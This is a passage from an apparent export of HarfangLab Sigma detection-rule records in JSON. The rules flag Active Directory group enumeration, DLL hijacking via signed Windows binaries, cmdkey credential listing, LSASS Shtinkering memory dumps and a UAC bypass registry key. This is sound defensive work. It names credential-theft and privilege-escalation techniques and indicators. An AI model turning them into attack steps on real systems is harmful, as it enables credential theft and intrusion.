"is_supervisor": true, + "is_tenant": false + }, + 
"tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.083577Z", + "creation_date": "2026-03-23T11:45:34.083580Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.083584Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814", + "https://blog.talosintelligence.com/emerging-interlock-ransomware/", + "https://attack.mitre.org/techniques/T1069/002/" + ], + "name": "t1069_002_domain_group_discovered_powershell.yml", + "content": "title: Domain Group Discovered via PowerShell\nid: 12345a32-eabd-4124-ad05-d724d29e4fd1\ndescription: |\n Detects the use of PowerShell to enumerate Active Directory groups.\n This may indicate reconnaissance activity aimed at identifying privileged, sensitive, or role-based groups.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2025/07/09\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[adsisearcher]'\n - 'objectCategory=group'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: 
medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "12345a32-eabd-4124-ad05-d724d29e4fd1", + "rule_name": "Domain Group Discovered via PowerShell", + "rule_description": "Detects the use of PowerShell to enumerate Active Directory groups.\nThis may indicate reconnaissance activity aimed at identifying privileged, sensitive, or role-based groups.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n", + "rule_creation_date": "2025-07-09", + "rule_modified_date": "2025-08-06", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1069.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "12abc941-fc36-4c0f-97cf-0f380e889982", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.099100Z", + "creation_date": "2026-03-23T11:45:34.099102Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.099106Z", + "rule_level": "high", + "rule_confidence": 
"strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_setup.yml", + "content": "title: DLL Hijacking via Setup.exe\nid: 12abc941-fc36-4c0f-97cf-0f380e889982\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio Setup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Setup.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\dlmgr.dll'\n filter_legitimate_image:\n - Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - 
ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "12abc941-fc36-4c0f-97cf-0f380e889982", + "rule_name": "DLL Hijacking via Setup.exe", + "rule_description": "Detects potential Windows DLL Hijacking via Visual Studio Setup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-12-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "12d65b1e-e1ac-4617-86a9-eda02d5297ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "moderate", + 
"alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.094687Z", + "creation_date": "2026-03-23T11:45:34.094689Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.094693Z", + "rule_level": "low", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1069/001/", + "https://attack.mitre.org/techniques/T1033/" + ], + "name": "t1033_groups_macos.yml", + "content": "title: Groups Listed via Groups\nid: 12d65b1e-e1ac-4617-86a9-eda02d5297ad\ndescription: |\n Detects the execution of the groups command.\n Attackers may use it during the discovery phase of an attack to enumerate the groups which a user belongs to.\n It is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/groups'\n\n exclusion_jamf:\n - 
ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_common_folder:\n - ProcessGrandparentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n - ProcessParentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "12d65b1e-e1ac-4617-86a9-eda02d5297ad", + "rule_name": "Groups Listed via Groups", + "rule_description": "Detects the execution of the groups command.\nAttackers may use it during the discovery phase of an attack to enumerate the groups which a user belongs to.\nIt is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2025-04-14", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1033", + "attack.t1069.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "12fbe22c-6804-46a4-9668-d8c5dca77830", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.605747Z", + "creation_date": "2026-03-23T11:45:34.605750Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.605757Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", + "https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/", + "https://attack.mitre.org/techniques/T1087/", + "https://attack.mitre.org/techniques/T1078/", + "https://attack.mitre.org/techniques/T1552/" + ], + "name": "t1087_account_credentials_cmdkey.yml", + "content": "title: Account Credentials Discovered via cmdkey.exe\nid: 12fbe22c-6804-46a4-9668-d8c5dca77830\ndescription: |\n Detects the execution of cmdkey.\n Attackers can use cmdkey to list system cached credentials, which can potentially be used for privilege escalation.\n Cmdkey can also be used to add or delete credentials to/from the cache.\n It is recommended to investigate the parent process for other suspicious actions.\nreferences:\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n - https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/\n - https://attack.mitre.org/techniques/T1087/\n - https://attack.mitre.org/techniques/T1078/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2022/12/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - 
attack.privilege_escalation\n - attack.t1552\n - attack.discovery\n - attack.t1087\n - attack.initial_access\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Cmdkey\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\cmdkey.exe'\n - OriginalFileName: 'cmdkey.exe'\n\n selection_cmdline:\n CommandLine|contains:\n - '/list'\n - '-list'\n\n exclusion_fiducial:\n ParentImage|endswith: '\\fermage.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "12fbe22c-6804-46a4-9668-d8c5dca77830", + "rule_name": "Account Credentials Discovered via cmdkey.exe", + "rule_description": "Detects the execution of cmdkey.\nAttackers can use cmdkey to list system cached credentials, which can potentially be used for privilege escalation.\nCmdkey can also be used to add or delete credentials to/from the cache.\nIt is recommended to investigate the parent process for other suspicious actions.\n", + "rule_creation_date": "2022-12-02", + "rule_modified_date": "2025-01-28", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery", + "attack.initial_access", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1078", + "attack.t1087", + "attack.t1552" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "13135882-44de-4952-9602-946619060e2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + 
"rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.591331Z", + "creation_date": "2026-03-23T11:45:34.591334Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.591341Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_eduprintprov.yml", + "content": "title: DLL Hijacking via eduprintprov.exe\nid: 13135882-44de-4952-9602-946619060e2e\ndescription: |\n Detects potential Windows DLL Hijacking via eduprintprov.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - 
attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'eduprintprov.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\deviceassociation.dll'\n - '\\policymanager.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "13135882-44de-4952-9602-946619060e2e", + "rule_name": "DLL Hijacking via eduprintprov.exe", + "rule_description": "Detects potential Windows DLL Hijacking via eduprintprov.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + 
"errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1326ca37-dc76-44d4-8db5-d101df291be4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.089206Z", + "creation_date": "2026-03-23T11:45:34.089208Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.089212Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_mcbuilder.yml", + "content": "title: DLL Hijacking via mcbuilder.exe\nid: 1326ca37-dc76-44d4-8db5-d101df291be4\ndescription: |\n Detects potential Windows DLL Hijacking via mcbuilder.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate 
the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mcbuilder.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcp47mrm.dll'\n - '\\mrmcoreR.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1326ca37-dc76-44d4-8db5-d101df291be4", + "rule_name": "DLL Hijacking via mcbuilder.exe", + "rule_description": "Detects potential Windows DLL Hijacking via mcbuilder.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the 
behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "13384352-88eb-420b-a83a-24445d5a52c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.095469Z", + "creation_date": "2026-03-23T11:45:34.095471Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.095475Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "name": "t1003_001_lsass_shtinkering.yml", + "content": "title: Possible LSASS Shtinkering Detected\nid: 
13384352-88eb-420b-a83a-24445d5a52c4\ndescription: |\n Detects LSASS Shtinkering, a technique that consists in sending an Exception Report to the WerFault process, that will in turn dump the process' memory if the environment is correctly set up.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to investigate and find the process responsible for the LSASS Shtinkering as well as to conduct memory forensics to determine the extracted credentials.\nreferences:\n - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/04/03\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n CallTrace|contains:\n - 'dbgcore.dll'\n - 'dbghelp.dll'\n - 'comsvcs.dll'\n SourceImage: '*\\WerFault.exe'\n ProcessCommandLine|contains: ' -u -p * -ip * -s *'\n\n exclusion_werfault:\n SourceImage: '*\\WerFault.exe'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\Faultrep.dll'\n - '?:\\Windows\\System32\\WerFault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n ProcessParentImage: '?:\\Windows\\System32\\lsass.exe'\n ProcessGrandparentImage: 
'?:\\Windows\\System32\\wininit.exe'\n\n exclusion_wermgr:\n SourceImage: '*\\wermgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentImage: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_werfaultsecure:\n SourceImage: '*\\WerFaultSecure.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\System32\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n ProcessCommandLine|contains: ' -u -p '\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "13384352-88eb-420b-a83a-24445d5a52c4", + "rule_name": "Possible LSASS Shtinkering Detected", + "rule_description": "Detects LSASS Shtinkering, a technique that consists in sending an Exception Report to the WerFault process, that will in turn dump the process' memory if the environment is correctly set up.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to investigate and find the process responsible for the LSASS Shtinkering as well as to conduct memory forensics to determine the extracted credentials.\n", + "rule_creation_date": "2023-04-03", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003.001", + "attack.t1078" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "13754f19-10c9-40db-935a-4043b68e2ffd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.092489Z", + "creation_date": "2026-03-23T11:45:34.092492Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.092496Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/hfiref0x/UACME", + "https://twitter.com/hfiref0x/status/928869933035020288" + ], + "name": "t1548_002_prepare_uac_bypass_icolordataproxy.yml", + "content": "title: IColorDataProxy COM UAC Bypass Prepared\nid: 13754f19-10c9-40db-935a-4043b68e2ffd\ndescription: |\n Detects the preparation of the display color calibration UAC bypass, involving the setting of a registry key.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://twitter.com/hfiref0x/status/928869933035020288\ndate: 2020/10/14\nmodified: 2025/04/14\nauthor: 
HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration\\DisplayCalibrator'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n filter_legitimate:\n # Legitime value set by Windows\n Details: '%SystemRoot%\\System32\\DCCW.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "13754f19-10c9-40db-935a-4043b68e2ffd", + "rule_name": "IColorDataProxy COM UAC Bypass Prepared", + "rule_description": "Detects the preparation of the display color calibration UAC bypass, involving the setting of a registry key.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges 